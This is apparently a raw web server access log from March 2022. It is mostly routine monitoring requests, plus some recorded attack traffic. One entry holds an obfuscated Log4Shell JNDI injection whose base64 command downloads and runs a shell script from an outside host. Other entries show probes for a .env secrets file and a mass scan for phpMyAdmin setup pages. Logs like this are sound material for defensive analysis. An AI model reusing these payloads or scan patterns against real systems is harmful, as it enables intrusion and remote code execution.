212.91.246.72 - - [03/Mar/2022:18:06:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:07:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:08:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:09:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:10:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:11:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:12:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:13:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:14:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:15:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:16:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:17:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.114.157 - - [03/Mar/2022:18:17:52 +0100] "GET / HTTP/1.1" 200 1229 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//205.185.114.157:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNDguMjI0LjI3L3dnZXQuc2g7IGNobW9kICt4IHdnZXQuc2g7IC4vd2dldC5zaDsgcm0gLXJmIHdnZXQuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//205.185.114.157:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNDguMjI0LjI3L3dnZXQuc2g7IGNobW9kICt4IHdnZXQuc2g7IC4vd2dldC5zaDsgcm0gLXJmIHdnZXQuc2g=}')"
180.180.190.128 - - [03/Mar/2022:18:18:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:18:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:19:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:20:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:18:20:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:21:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:22:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.123 - - [03/Mar/2022:18:23:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:18:23:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:24:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:25:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:26:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:27:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:28:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.164.245.146 - - [03/Mar/2022:18:29:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:18:29:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [03/Mar/2022:18:29:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
62.10.47.188 - - [03/Mar/2022:18:30:36 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:30:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:31:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.10.47.188 - - [03/Mar/2022:18:32:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:32:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:33:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.78.182.55 - - [03/Mar/2022:18:33:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Mar/2022:18:34:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:35:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:36:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:37:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.10.47.188 - - [03/Mar/2022:18:38:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Mar/2022:18:38:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:18:39:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.88:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.87:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.85:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.83:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.81:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.89:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.84:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.88:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.87:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.85:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:08 +0100] "GET http://212.91.246.83:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.81:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.89:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.85:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.84:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.88:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.87:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.83:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.81:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.85:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.83:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.88:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.84:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:09 +0100] "GET http://212.91.246.89:80/ysqladmin/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.87:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.85:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.83:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.81:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.88:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.84:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.89:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.87:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.83:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.85:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.88:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.81:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.89:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.84:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.87:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.85:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:10 +0100] "GET http://212.91.246.83:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.88:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.81:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.89:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.84:80/phpMyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.83:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.85:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.87:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.88:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.81:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.89:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.84:80/sqladmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.83:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.85:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.87:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.81:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.88:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.89:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.84:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.83:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.85:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:11 +0100] "GET http://212.91.246.87:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.84:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.81:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.88:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.89:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.83:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.85:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.87:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.81:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.88:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.84:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.89:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.87:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.83:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.85:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.88:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.84:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.81:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.89:80/phpmy/scripts/setup.php HTTP/1.0" 404 328 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.87:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.83:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.85:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.81:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.88:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.84:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:12 +0100] "GET http://212.91.246.89:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.87:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.83:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.85:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.84:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.88:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.81:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.89:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.87:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.84:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.81:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.89:80/sql/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:13 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.89:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.87:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.83:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.85:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.88:80/phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
209.141.61.19 - - [03/Mar/2022:18:40:14 +0100] "GET http://212.91.246.84:80/phpMyAdmin-2.11.1-rc1/scripts/setup.php HTTP/1.0" 404 344 "-" "-"
